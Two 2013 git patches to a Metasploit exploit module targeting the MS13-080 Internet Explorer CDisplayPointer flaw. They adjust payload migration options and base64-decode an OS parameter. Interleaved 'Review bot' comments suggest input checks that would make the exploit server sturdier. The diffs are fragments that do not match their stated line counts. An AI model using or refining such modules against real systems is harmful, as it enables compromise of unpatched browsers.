From ac78f1cc5bb8011e0501c390e7befff761fcff63 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Tue, 15 Oct 2013 23:37:11 -0500
Subject: [PATCH 1/2] Use Base64 encoding for OS parameter

I didn't even realize we already added this in server.rb. So instead of just escaping the OS parameter, we also encode the data in base64. I also added prependmigrate to avoid unstable conditions for the payload.
---
 .../windows/browser/ms13_080_cdisplaypointer.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
index cdbd765418..3b46067eea 100644
--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,6 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 },
 'DefaultOptions' =>
 {
+ 'PrependMigrate' => true,
 'InitialAutoRunScript' => 'migrate -f'
 },
 'Privileged' => false,
@@ -88,6 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def get_check_html
 %Q|
@@ -280,7 +282,12 @@ function kaiju() {
 def on_request_uri(cli, request)
 if request.uri =~ /search\?o=(.+)\&d=(.+)$/
- target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }
+ target_info =
+ {
+ :os => Rex::Text.decode_base64(Rex::Text.uri_decode($1)),
+ :dll => Rex::Text.uri_decode($2)
+ }
+
 sploit = get_sploit_html(target_info)
 send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
 return

From 06a212207e03d5285c617e8f1c72f88447d17292 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Wed, 16 Oct 2013 09:24:46 -0500
Subject: [PATCH 2/2] Put PrependMigrate on hold because of #1674

But I will probably still want this.
---
 modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
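Review bot: In the `on_request_uri` hunk the base64-decoded `:os` value is handed straight to `get_sploit_html` without any check that it is one of the OS strings the module actually dispatches on; `Rex::Text.decode_base64` does not reject malformed input, so an unexpected or garbled `o=` parameter arrives as arbitrary bytes rather than an error. Unless `get_sploit_html` already rejects unknown values (its body is not in this hunk), an early `return` when `target_info[:os]` is not among the expected OS strings would keep bad requests from reaching the page-building code. The asymmetry with `:dll`, which is still only URI-decoded, also deserves a line comment such as `# o= is base64-encoded on the sending side (see commit message); d= is plain URI-encoded`, since a later reader will otherwise assume one of the two is a mistake. `on_request_uri` continues past the end of the hunk.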
diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
index 3b46067eea..0447278a3b 100644
--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 },
 'DefaultOptions' =>
 {
- 'PrependMigrate' => true,
+ #'PrependMigrate' => true,
 'InitialAutoRunScript' => 'migrate -f'
 },
 'Privileged' => false,
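Review bot: The commented-out `#'PrependMigrate' => true,` line gives no hint of why the option is disabled; the reason lives only in the commit message. Carrying it into the file, e.g. `# 'PrependMigrate' => true, # on hold until #1674 is resolved`, lets the next maintainer know whether it is safe to re-enable, and the conventional space after `#` keeps the comment consistent with Ruby style. The enclosing module-info hash starts and ends outside the hunk.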